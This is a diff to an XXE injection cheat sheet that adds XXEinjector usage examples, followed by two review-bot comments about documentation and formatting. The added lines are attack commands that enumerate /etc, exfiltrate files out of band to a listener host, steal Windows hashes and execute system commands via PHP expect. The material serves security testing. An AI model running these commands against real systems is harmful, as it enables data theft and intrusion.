diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b11ebd9..d4792dd 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -42,7 +42,31 @@ Syntax: `` ``` $ python3 230.py 2121 ``` - + - [XXEinjector](https://github.com/enjoiz/XXEinjector) + ```bash + # Enumerating /etc directory in HTTPS application: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl + # Enumerating /etc directory using gopher for OOB method: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher + # Second order exploitation: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt + # Bruteforcing files using HTTP out of band method and netdoc protocol: + ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc + # Enumerating using direct exploitation: + ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK + # Enumerating unfiltered ports: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all + # Stealing Windows hashes: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes + # Uploading files using Java jar: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf + # Executing system commands using PHP expect: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls + # Testing for XSLT injection: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt + # Log requests only: + ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt + ``` ## Detect the vulnerability 
@@ -454,4 +478,4 @@ updating: xl/sharedStrings.xml (deflated 17%) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) -- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) \ No newline at end of file +- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
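Review bot: in the first hunk (`@@ -42,7 +42,31 @@`), the new XXEinjector entry is a link followed by eleven invocations, with no sentence saying what the tool does or what `--host=192.168.0.2` and `--file=/tmp/req.txt` refer to. A reader cannot tell from the added lines whether the address is the tester's own machine or the application under test, or what the request file is expected to contain. Suggest adding one introductory line under the link that states the tool's purpose and the meaning of those two options, and pointing to the upstream README for the full option list so this copy does not drift from it. The last example (`--logger --oob=http --output=/tmp/out.txt`) is the only one without `--host` and `--file`; a short comment on why it needs neither would help.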
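Review bot: in the second hunk (`@@ -454,4 +478,4 @@`), the only change is the trailing newline on the last reference, which is unrelated to the XXEinjector addition and is worth mentioning in the commit message so it is not mistaken for a content edit. Since the line is being touched anyway, note that the reference list mixes bullet styles in the visible context: the first two entries use `*` while the last two use `-`. The final title is also all caps, unlike the entries above it. Normalising both here would keep the list consistent.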